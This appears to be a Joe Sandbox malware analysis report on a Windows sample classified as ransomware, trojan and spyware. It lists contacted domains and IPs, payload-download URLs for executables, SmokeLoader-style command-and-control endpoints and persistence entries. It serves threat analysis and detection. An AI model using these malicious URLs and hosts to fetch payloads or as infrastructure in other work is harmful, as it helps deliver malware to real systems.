        https://lotuseffectllc.com/plugins/panel/uploads/Mwczjtflz.mp41PbOVxtHXhP2g/7AFwH2Lkw==0%Avira URL Cloudsafe
        https://www.tazc.com.my/wp-content/images/pic4.jpg0%Avira URL Cloudsafe
        http://d-s-p.ru/tmp/index.php100%Avira URL Cloudmalware
        http://worldofmorgan.com/tmp/index.php0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        webdot.ddns.net
        		87.120.115.216
        		truetrue
          		unknown
          tazc.com.my
          		51.79.230.147
          		truetrue
            		unknown
            midginvineco.com
            		23.145.40.181
            		truetrue
              		unknown
              firemane.org
              		45.118.248.184
              		truetrue
                		unknown
                d-s-p.ru
                		58.151.148.90
                		truetrue
                  		unknown
                  upadaria.org
                  		192.185.146.136
                  		truetrue
                    		unknown
                    lotuseffectllc.com
                    		192.185.175.158
                    		truefalse
                      		unknown
                      www.tazc.com.my
                      		unknown
                      		unknowntrue
                        		unknown
                        kdtIFBJmLPfUAdsjOyiinDxA.kdtIFBJmLPfUAdsjOyiinDxA
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://firemane.org/Birge.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://wga2s.cc/tmp/index.phptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://lotuseffectllc.com/plugins/panel/uploads/Mwczjtflz.mp4false
                          • Avira URL Cloud: safe
                          		unknown
                          https://upadaria.org/Vmujqcxm.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://volisolsa.com.ua/tmp/index.phptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.tazc.com.my/wp-content/images/pic4.jpgtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://worldofmorgan.com/tmp/index.phptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://d-s-p.ru/tmp/index.phptrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJ3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.0000000004095000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeRegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://lotuseffectllc.com3E6C.exe, 0000000C.00000002.3947321786.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://excel.office.comexplorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.microexplorer.exe, 00000001.00000000.1714596622.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1714204674.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1716009180.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://www.autoitscript.com/autoit3/Bookings.7.drfalse
                                                		high
                                                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/mgravell/protobuf-neti3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://stackoverflow.com/q/11564914/23354;3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeRegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.msn.com/qexplorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1717647686.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3E6C.exe, 0000000C.00000002.3947321786.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.autoitscript.com/autoit3/JBookings.7.drfalse
                                                                                      		high
                                                                                      https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1717647686.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://word.office.comexplorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://stackoverflow.com/q/14436606/233543E6C.exe, 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllRegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://github.com/mgravell/protobuf-net3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://nsis.sf.net/NSIS_ErrorErrorA723.exe, 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmp, A723.exe, 00000007.00000000.3669719251.0000000000409000.00000002.00000001.01000000.00000006.sdmp, C3F.exe, 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, C3F.exe, 0000000E.00000000.4002122911.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, A723.exe.1.dr, C3F.exe.1.dr, 77D2.exe.1.drfalse
                                                                                                            		high
                                                                                                            https://lotuseffectllc.com/plugins/panel/uploads/Mwczjtflz.mp41PbOVxtHXhP2g/7AFwH2Lkw==3E6C.exe, 0000000C.00000000.3893775169.0000000000A42000.00000002.00000001.01000000.00000008.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, Result.exe.12.dr, 3E6C.exe.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://james.newtonking.com/projects/json3E6C.exe, 0000000C.00000000.3893775169.0000000000A42000.00000002.00000001.01000000.00000008.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, Result.exe.12.dr, 3E6C.exe.1.drfalse
                                                                                                                		high
                                                                                                                https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1714985098.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://stackoverflow.com/q/2152978/23354rCannotRegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://stackoverflow.com/q/2152978/233543E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1717647686.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.newtonsoft.com/jsonschema3E6C.exe.1.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.nuget.org/packages/Newtonsoft.Json.Bson3E6C.exe, 0000000C.00000000.3893775169.0000000000A42000.00000002.00000001.01000000.00000008.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, Result.exe.12.dr, 3E6C.exe.1.drfalse
                                                                                                                                          		high
                                                                                                                                          https://api.msn.com/explorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://outlook.com_explorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          51.79.230.147
                                                                                                                                                          		tazc.com.myCanada
                                                                                                                                                          		16276OVHFRtrue
                                                                                                                                                          58.151.148.90
                                                                                                                                                          		d-s-p.ruKorea Republic of
                                                                                                                                                          		17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
                                                                                                                                                          45.118.248.184
                                                                                                                                                          		firemane.orgHong Kong
                                                                                                                                                          		134705ITACE-AS-APItaceInternationalLimitedHKtrue
                                                                                                                                                          192.185.175.158
                                                                                                                                                          		lotuseffectllc.comUnited States
                                                                                                                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                          23.145.40.181
                                                                                                                                                          		midginvineco.comReserved
                                                                                                                                                          		22631SURFAIRWIRELESS-IN-01UStrue
                                                                                                                                                          101.99.94.162
                                                                                                                                                          		unknownMalaysia
                                                                                                                                                          		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                                                                                                                                                          192.185.146.136
                                                                                                                                                          		upadaria.orgUnited States
                                                                                                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                          87.120.115.216
                                                                                                                                                          		webdot.ddns.netBulgaria
                                                                                                                                                          		25206UNACS-AS-BG8000BurgasBGtrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1582512
                                                                                                                                                          Start date and time:2024-12-30 19:41:05 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 11m 15s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:21
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:hoEtvOOrYH.exe
                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                          Original Sample Name:2a270773553cfdca5c1fdbf24d44f18c.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@30/31@13/8
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                                          • Number of executed functions: 408
                                                                                                                                                          • Number of non-executed functions: 88
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                          Warnings

                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target 3E6C.exe, PID 5796 because it is empty
                                                                                                                                                          • Execution Graph export aborted for target RegAsm.exe, PID 6416 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                          • VT rate limit hit for: hoEtvOOrYH.exe

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          13:42:19API Interceptor376731x Sleep call for process: explorer.exe modified
                                                                                                                                                          13:45:17API Interceptor1x Sleep call for process: A723.exe modified
                                                                                                                                                          13:45:39API Interceptor15x Sleep call for process: 3E6C.exe modified
                                                                                                                                                          13:45:51API Interceptor1x Sleep call for process: C3F.exe modified
                                                                                                                                                          13:45:54API Interceptor8x Sleep call for process: Result.exe modified
                                                                                                                                                          18:42:20Task SchedulerRun new task: Firefox Default Browser Agent 9CF14C09A2D67F43 path: C:\Users\user\AppData\Roaming\jagvise
                                                                                                                                                          18:45:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs
                                                                                                                                                          18:46:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartHomeSyncX.url

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          51.79.230.147Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • www.malaya.live/hcfu/
                                                                                                                                                          58.151.148.90PSyWSlhDa5.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • tnc-corp.ru/tmp/index.php
                                                                                                                                                          1HGXcC63iu.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • nwgrus.ru/tmp/index.php
                                                                                                                                                          veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • nwgrus.ru/tmp/index.php
                                                                                                                                                          oRKal761Qm.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                                                                                                          • 100xmargin.com/tmp/index.php
                                                                                                                                                          file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                          • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                                                                                                          n72I7qB2ss.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • mzxn.ru/tmp/index.php
                                                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • gebeus.ru/tmp/index.php
                                                                                                                                                          cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • gebeus.ru/tmp/index.php
                                                                                                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • gebeus.ru/tmp/index.php
                                                                                                                                                          file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                                                                                                                          • gebeus.ru/tmp/index.php
                                                                                                                                                          23.145.40.1813WaqgS34S7.exeGet hashmaliciousSmokeLoaderBrowse

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            midginvineco.com3WaqgS34S7.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                            • 23.145.40.181

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            POWERVIS-AS-KRLGPOWERCOMMKRsh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                            • 119.69.3.69
                                                                                                                                                            m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                            • 112.155.155.23
                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                            • 182.221.148.255
                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                            • 125.243.127.174
                                                                                                                                                            xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 116.41.232.214
                                                                                                                                                            telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 182.228.224.84
                                                                                                                                                            armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 116.40.79.14
                                                                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 115.143.245.148
                                                                                                                                                            armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 112.146.154.107
                                                                                                                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 122.32.192.173
                                                                                                                                                            UNIFIEDLAYER-AS-1USAirway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                            • 108.179.193.23
                                                                                                                                                            botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 173.254.41.71
                                                                                                                                                            botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 50.87.246.4
                                                                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 162.241.240.41
                                                                                                                                                            https://its.piquedigital.com.br/maryland.gov/&adfs/ls/client-request-id=7c724&wa=wsignin10.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 108.179.253.82
                                                                                                                                                            http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 162.241.149.91
                                                                                                                                                            http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 162.241.149.91
                                                                                                                                                            987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 162.241.62.63
                                                                                                                                                            xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 142.5.37.64
                                                                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 74.91.145.200
                                                                                                                                                            ITACE-AS-APItaceInternationalLimitedHKvcimanagement.armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                            • 156.237.86.202
                                                                                                                                                            vcimanagement.powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                            • 156.235.45.173
                                                                                                                                                            vcimanagement.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                            • 156.227.127.146
                                                                                                                                                            vcimanagement.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                            • 156.235.45.170
                                                                                                                                                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                            • 154.194.208.251
                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                            • 156.235.45.132
                                                                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 154.223.17.19
                                                                                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 156.230.174.51
                                                                                                                                                            HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 45.204.213.99
                                                                                                                                                            HLMJbase.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 45.204.213.99
